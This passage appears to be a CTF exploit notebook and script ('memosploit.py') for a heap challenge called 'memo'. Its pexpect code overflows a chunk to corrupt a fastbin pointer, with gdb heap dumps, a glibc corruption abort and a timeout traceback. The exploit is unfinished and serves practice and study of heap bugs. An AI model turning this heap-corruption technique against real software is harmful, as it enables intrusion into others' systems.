"Breakpoint 3, 0x0000000000400d85 in ?? ()\n",
"\u001b[;31mgdb-peda$ \u001b[0m\u001b[;31mgdb-peda$ \u001b[0m====================================Fastbins====================================\n",
"\n",
"[ fb 0 ] 0x7ffff7dd4ae8 -> [ 0x0 ] \n",
"[ fb 1 ] 0x7ffff7dd4af0 -> [ 0x603030 ] (48)\n",
" [ 0x603060 ] (48)\n",
"[ fb 2 ] 0x7ffff7dd4af8 -> [ 0x0 ] \n",
"[ fb 3 ] 0x7ffff7dd4b00 -> [ 0x0 ] \n",
"[ fb 4 ] 0x7ffff7dd4b08 -> [ 0x0 ] \n",
"[ fb 5 ] 0x7ffff7dd4b10 -> [ 0x0 ] \n",
"[ fb 6 ] 0x7ffff7dd4b18 -> [ 0x0 ] \n",
"[ fb 7 ] 0x7ffff7dd4b20 -> [ 0x0 ] \n",
"[ fb 8 ] 0x7ffff7dd4b28 -> [ 0x0 ] \n",
"[ fb 9 ] 0x7ffff7dd4b30 -> [ 0x0 ] \n",
"\u001b[;31mgdb-peda$ \u001b[0mContinuing.\n",
"1. Leave message on memo\n",
"2. Edit message last memo\n",
"3. View memo\n",
"4. Delete memo\n",
"5. Change password\n",
"6. Quit.\n",
">> "
]
},
{
"data": {
"text/plain": [
"0"
]
},
"execution_count": 8,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"TOOMUCH=96\n",
"NEWSIZE=struct.pack(\"<Q\", 0x20)\n",
"NEWPTR=struct.pack(\"<Q\", 0x603060)\n",
"ZERO=struct.pack(\"<Q\", 0)\n",
"print(NEWSIZE, NEWPTR, ZERO)\n",
"# alloc(1)\n",
"p.sendline(\"1\")\n",
"p.expect(\"Index: \")\n",
"p.sendline(\"1\")\n",
"p.expect(\"Length: \")\n",
"p.sendline(str(TOOMUCH))\n",
"p.expect(\"message too long, you can leave on memo though\")\n",
"print(\"--->{0}\".format(p.sendline(0x20 * 'D' + ZERO + NEWSIZE + NEWPTR)))\n",
"#print(\"--->{0}\".format(p.sendline(\"ABCDEFGHIJKLMNOPQRSTUVWXYZ123456abcdefghijklmnopqrstuvwxyz12345\")))\n",
"\n",
"p.expect(\"peda\\$\")\n",
"p.sendline(\"x/8xw 0x603030\")\n",
"p.readline()\n",
"p.sendline(\"c\")\n",
"p.readline()\n",
"p.sendline('python from libheap import *')\n",
"p.expect(\"peda\\$\")\n",
"p.sendline(\"heap -f\")\n",
"p.readline()\n",
"p.sendline(\"c\")\n",
"\n",
"p.expect(\">> \")"
]
},
{
"cell_type": "code",
"execution_count": 9,
"metadata": {
"collapsed": false
},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"1\n",
"Index: 2\n",
"Length: 31\n",
"*** Error in `/home/p1kachu/Dropbox/TMP/bkp/memo': malloc(): memory corruption (fast): 0x0000000000603040 ***\n",
"======= Backtrace: =========\n",
"/usr/lib/libc.so.6(+0x70c4b)[0x7ffff7aacc4b]\n",
"/usr/lib/libc.so.6(+0x76fe6)[0x7ffff7ab2fe6]\n",
"/usr/lib/libc.so.6(+0x79411)[0x7ffff7ab5411]\n",
"/usr/lib/libc.so.6(__libc_malloc+0x54)[0x7ffff7ab6d44]\n",
"/home/p1kachu/Dropbox/TMP/bkp/memo[0x400cd2]\n",
"/home/p1kachu/Dropbox/TMP/bkp/memo[0x4011aa]\n",
"/usr/lib/libc.so.6(__libc_start_main+0xf1)[0x7ffff7a5c291]\n",
"/home/p1kachu/Dropbox/TMP/bkp/memo[0x4008c9]\n",
"======= Memory map: ========\n",
"00400000-00402000 r-xp 00000000 08:04 57556941 /home/p1kachu/Dropbox/TMP/bkp/memo\n",
"00601000-00602000 r--p 00001000 08:04 57556941 /home/p1kachu/Dropbox/TMP/bkp/memo\n",
"00602000-00603000 rw-p 00002000 08:04 57556941 /home/p1kachu/Dropbox/TMP/bkp/memo\n",
"00603000-00624000 rw-p 00000000 00:00 0 [heap]\n",
"7ffff0000000-7ffff0021000 rw-p 00000000 00:00 0 \n",
"7ffff0021000-7ffff4000000 ---p 00000000 00:00 0 \n",
"7ffff7825000-7ffff783b000 r-xp 00000000 08:02 2148433 /usr/lib/libgcc_s.so.1\n",
"7ffff783b000-7ffff7a3a000 ---p 00016000 08:02 2148433 /usr/lib/libgcc_s.so.1\n",
"7ffff7a3a000-7ffff7a3b000 r--p 00015000 08:02 2148433 /usr/lib/libgcc_s.so.1\n",
"7ffff7a3b000-7ffff7a3c000 rw-p 00016000 08:02 2148433 /usr/lib/libgcc_s.so.1\n",
"7ffff7a3c000-7ffff7bd1000 r-xp 00000000 08:02 2184929 /usr/lib/libc-2.24.so\n",
"7ffff7bd1000-7ffff7dd0000 ---p 00195000 08:02 2184929 /usr/lib/libc-2.24.so\n",
"7ffff7dd0000-7ffff7dd4000 r--p 00194000 08:02 2184929 /usr/lib/libc-2.24.so\n",
"7ffff7dd4000-7ffff7dd6000 rw-p 00198000 08:02 2184929 /usr/lib/libc-2.24.so\n",
"7ffff7dd6000-7ffff7dda000 rw-p 00000000 00:00 0 \n",
"7ffff7dda000-7ffff7dfd000 r-xp 00000000 08:02 2184928 /usr/lib/ld-2.24.so\n",
"7ffff7fc7000-7ffff7fc9000 rw-p 00000000 00:00 0 \n",
"7ffff7ff7000-7ffff7ff8000 rw-p 00000000 00:00 0 \n",
"7ffff7ff8000-7ffff7ffa000 r--p 00000000 00:00 0 [vvar]\n",
"7ffff7ffa000-7ffff7ffc000 r-xp 00000000 00:00 0 [vdso]\n",
"7ffff7ffc000-7ffff7ffd000 r--p 00022000 08:02 2184928 /usr/lib/ld-2.24.so\n",
"7ffff7ffd000-7ffff7ffe000 rw-p 00023000 08:02 2184928 /usr/lib/ld-2.24.so\n",
"7ffff7ffe000-7ffff7fff000 rw-p 00000000 00:00 0 \n",
"7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0 [stack]\n",
"ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]\n",
"\n",
"Program received signal SIGABRT, Aborted.\n",
"0x00007ffff7a6f04f in raise () from /usr/lib/libc.so.6\n",
"\u001b[;31mgdb-peda$ \u001b[0m"
]
},
{
"ename": "TIMEOUT",
"evalue": "Timeout exceeded.\n<pexpect.pty_spawn.spawn object at 0x7fb88066a3d0>\ncommand: /usr/bin/gdb\nargs: ['/usr/bin/gdb', './memo']\nbuffer (last 100 chars): 'gnal SIGABRT, Aborted.\\r\\n0x00007ffff7a6f04f in raise () from /usr/lib/libc.so.6\\r\\n\\x1b[;31mgdb-peda$ \\x1b[0m'\nbefore (last 100 chars): 'gnal SIGABRT, Aborted.\\r\\n0x00007ffff7a6f04f in raise () from /usr/lib/libc.so.6\\r\\n\\x1b[;31mgdb-peda$ \\x1b[0m'\nafter: <class 'pexpect.exceptions.TIMEOUT'>\nmatch: None\nmatch_index: None\nexitstatus: None\nflag_eof: False\npid: 26466\nchild_fd: 52\nclosed: False\ntimeout: 30\ndelimiter: <class 'pexpect.exceptions.EOF'>\nlogfile: <ipykernel.iostream.OutStream object at 0x7fb883743e50>\nlogfile_read: None\nlogfile_send: None\nmaxread: 2000\nignorecase: False\nsearchwindowsize: None\ndelaybeforesend: 0.05\ndelayafterclose: 0.1\ndelayafterterminate: 0.1\nsearcher: searcher_re:\n 0: re.compile(\"Message: \")",
"output_type": "error",
"traceback": [
"\u001b[0;31m\u001b[0m",
"\u001b[0;31mTIMEOUT\u001b[0mTraceback (most recent call last)",
"\u001b[0;32m<ipython-input-9-d1cb50506b19>\u001b[0m in \u001b[0;36m<module>\u001b[0;34m()\u001b[0m\n\u001b[1;32m 7\u001b[0m \u001b[0mp\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mexpect\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0;34m\"Length: \"\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 8\u001b[0m \u001b[0mp\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0msendline\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mstr\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mSIZE\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0;32m----> 9\u001b[0;31m \u001b[0mp\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mexpect\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0;34m\"Message: \"\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0m\u001b[1;32m 10\u001b[0m \u001b[0mp\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0msendline\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mSIZE\u001b[0m \u001b[0;34m*\u001b[0m \u001b[0;34m'A'\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 11\u001b[0m \u001b[0mp\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mexpect\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0;34m\">> \"\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n",
"\u001b[0;32m/usr/lib/python2.7/site-packages/pexpect/spawnbase.pyc\u001b[0m in \u001b[0;36mexpect\u001b[0;34m(self, pattern, timeout, searchwindowsize, async)\u001b[0m\n\u001b[1;32m 319\u001b[0m \u001b[0mcompiled_pattern_list\u001b[0m \u001b[0;34m=\u001b[0m \u001b[0mself\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mcompile_pattern_list\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mpattern\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 320\u001b[0m return self.expect_list(compiled_pattern_list,\n\u001b[0;32m--> 321\u001b[0;31m timeout, searchwindowsize, async)\n\u001b[0m\u001b[1;32m 322\u001b[0m \u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 323\u001b[0m def expect_list(self, pattern_list, timeout=-1, searchwindowsize=-1,\n",
"\u001b[0;32m/usr/lib/python2.7/site-packages/pexpect/spawnbase.pyc\u001b[0m in \u001b[0;36mexpect_list\u001b[0;34m(self, pattern_list, timeout, searchwindowsize, async)\u001b[0m\n\u001b[1;32m 343\u001b[0m \u001b[0;32mreturn\u001b[0m \u001b[0mexpect_async\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mexp\u001b[0m\u001b[0;34m,\u001b[0m \u001b[0mtimeout\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 344\u001b[0m \u001b[0;32melse\u001b[0m\u001b[0;34m:\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0;32m--> 345\u001b[0;31m \u001b[0;32mreturn\u001b[0m \u001b[0mexp\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mexpect_loop\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mtimeout\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0m\u001b[1;32m 346\u001b[0m \u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 347\u001b[0m def expect_exact(self, pattern_list, timeout=-1, searchwindowsize=-1,\n",
"\u001b[0;32m/usr/lib/python2.7/site-packages/pexpect/expect.pyc\u001b[0m in \u001b[0;36mexpect_loop\u001b[0;34m(self, timeout)\u001b[0m\n\u001b[1;32m 105\u001b[0m \u001b[0;32mreturn\u001b[0m \u001b[0mself\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0meof\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0me\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 106\u001b[0m \u001b[0;32mexcept\u001b[0m \u001b[0mTIMEOUT\u001b[0m \u001b[0;32mas\u001b[0m \u001b[0me\u001b[0m\u001b[0;34m:\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0;32m--> 107\u001b[0;31m \u001b[0;32mreturn\u001b[0m \u001b[0mself\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mtimeout\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0me\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0m\u001b[1;32m 108\u001b[0m \u001b[0;32mexcept\u001b[0m\u001b[0;34m:\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 109\u001b[0m \u001b[0mself\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0merrored\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n",
"\u001b[0;32m/usr/lib/python2.7/site-packages/pexpect/expect.pyc\u001b[0m in \u001b[0;36mtimeout\u001b[0;34m(self, err)\u001b[0m\n\u001b[1;32m 68\u001b[0m \u001b[0;32mif\u001b[0m \u001b[0merr\u001b[0m \u001b[0;32mis\u001b[0m \u001b[0;32mnot\u001b[0m \u001b[0mNone\u001b[0m\u001b[0;34m:\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 69\u001b[0m \u001b[0mmsg\u001b[0m \u001b[0;34m=\u001b[0m \u001b[0mstr\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0merr\u001b[0m\u001b[0;34m)\u001b[0m \u001b[0;34m+\u001b[0m \u001b[0;34m'\\n'\u001b[0m \u001b[0;34m+\u001b[0m \u001b[0mmsg\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0;32m---> 70\u001b[0;31m \u001b[0;32mraise\u001b[0m \u001b[0mTIMEOUT\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mmsg\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0m\u001b[1;32m 71\u001b[0m \u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 72\u001b[0m \u001b[0;32mdef\u001b[0m \u001b[0merrored\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mself\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m:\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n",
"\u001b[0;31mTIMEOUT\u001b[0m: Timeout exceeded.\n<pexpect.pty_spawn.spawn object at 0x7fb88066a3d0>\ncommand: /usr/bin/gdb\nargs: ['/usr/bin/gdb', './memo']\nbuffer (last 100 chars): 'gnal SIGABRT, Aborted.\\r\\n0x00007ffff7a6f04f in raise () from /usr/lib/libc.so.6\\r\\n\\x1b[;31mgdb-peda$ \\x1b[0m'\nbefore (last 100 chars): 'gnal SIGABRT, Aborted.\\r\\n0x00007ffff7a6f04f in raise () from /usr/lib/libc.so.6\\r\\n\\x1b[;31mgdb-peda$ \\x1b[0m'\nafter: <class 'pexpect.exceptions.TIMEOUT'>\nmatch: None\nmatch_index: None\nexitstatus: None\nflag_eof: False\npid: 26466\nchild_fd: 52\nclosed: False\ntimeout: 30\ndelimiter: <class 'pexpect.exceptions.EOF'>\nlogfile: <ipykernel.iostream.OutStream object at 0x7fb883743e50>\nlogfile_read: None\nlogfile_send: None\nmaxread: 2000\nignorecase: False\nsearchwindowsize: None\ndelaybeforesend: 0.05\ndelayafterclose: 0.1\ndelayafterterminate: 0.1\nsearcher: searcher_re:\n 0: re.compile(\"Message: \")"
]
}
],
"source": [
"SIZE=31\n",
"\n",
"# alloc(2)\n",
"p.sendline(\"1\")\n",
"p.expect(\"Index: \")\n",
"p.sendline(\"2\")\n",
"p.expect(\"Length: \")\n",
"p.sendline(str(SIZE))\n",
"p.expect(\"Message: \")\n",
"p.sendline(SIZE * 'A')\n",
"p.expect(\">> \")\n",
"\n",
"# alloc(0)\n",
"p.sendline('1')\n",
"p.expect(\"Index: \")\n",
"p.sendline(\"0\")\n",
"p.expect(\"Length: \")\n",
"p.sendline(str(SIZE))\n",
"p.expect(\"Message: \")\n",
"p.sendline(SIZE * 'A')\n",
"p.expect(\">> \")"
]
}
],
"metadata": {
"kernelspec": {
"display_name": "Python 2",
"language": "python",
"name": "python2"
},
"language_info": {
"codemirror_mode": {
"name": "ipython",
"version": 2
},
"file_extension": ".py",
"mimetype": "text/x-python",
"name": "python",
"nbconvert_exporter": "python",
"pygments_lexer": "ipython2",
"version": "2.7.13"
}
},
"nbformat": 4,
"nbformat_minor": 2
}
Raw
memosploit.py
#!/usr/bin/env python2
# Without gdb
import pexpect
import struct
import sys
p = pexpect.spawn('./memo')
p.logfile = sys.stdout
p.setecho(False)
# malloc pointer
# |
# slots: v
# malloc(1) = 0x603010 | 0x0 (8bytes) | 0x31 (8 bytes) | 0xDATA (32 bytes)
# malloc(2) = 0x603040 | 0x0 (8bytes) | 0x31 (8 bytes) | 0xDATA (32 bytes)
# free(2) | 0x0 (8bytes) | 0x31 (8 bytes) | 0xPREV (8 bytes) | 0xNEXT (8 bytes)
# free(1) | 0x0 (8bytes) | 0x31 (8 bytes) | 0xPREV (8 bytes) | 0xNEXT (8 bytes)
# malloc(1) = 0x603010 | 0x0 (8bytes) | 0x31 (8 bytes) | 0x424242...
# malloc(2) = 0x603040 | ...0x4242... (8 bytes) | ...0x4242... (8 bytes) | 0xDATA (32 bytes)
# malloc(0) = 0x424242.... | 0x0 (8bytes) | 0x1000 (8 bytes) | 0xDATA (LOT OF BYTES)
p.expect("What's user name:")
p.sendline("P1kachu")
p.expect("Do you wanna set password\? \(y/n\)")
p.sendline("y")
p.expect("Password: ")
p.sendline("/bin/sh")
p.expect(">> ")
SIZE=31
# alloc(1)
p.sendline("1")
p.expect("Index: ")
p.sendline("1")
p.expect("Length: ")
p.sendline(str(SIZE))
p.expect("Message: ")
p.sendline(SIZE * 'A')
p.expect(">> ")
# alloc(2)
p.sendline('1')
p.expect("Index: ")
p.sendline("2")
p.expect("Length: ")
p.sendline(str(SIZE))
p.expect("Message: ")
p.sendline(SIZE * 'A')
p.expect(">> ")
# free(2)
p.sendline('4')
p.expect("Index: ")
p.sendline("2")
p.expect(">> ")
# free(1)
p.sendline('4')
p.expect("Index: ")
p.sendline("1")
p.expect(">> ")
TOOMUCH=96
NEWSIZE=struct.pack("<Q", 0x20)
NEWPTR=struct.pack("<Q", 0x603060)
ZERO=struct.pack("<Q", 0)
# alloc(1)
p.sendline("1")
p.expect("Index: ")
p.sendline("1")
p.expect("Length: ")
p.sendline(str(TOOMUCH))
p.expect("message too long, you can leave on memo though")
p.sendline(0x20 * 'D' + ZERO + NEWSIZE + NEWPTR)
p.expect(">> ")
# alloc(2)
p.sendline("1")
p.expect("Index: ")
p.sendline("2")
p.expect("Length: ")
p.sendline(str(SIZE))
p.expect("Message: ")
p.sendline(SIZE * 'A')
p.expect(">> ")
# alloc(0)
p.sendline('1')
p.expect("Index: ")
p.sendline("0")
p.expect("Length: ")
p.sendline(str(SIZE))
p.expect("Message: ")
p.sendline(SIZE * 'A')
p.expect(">> ")
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment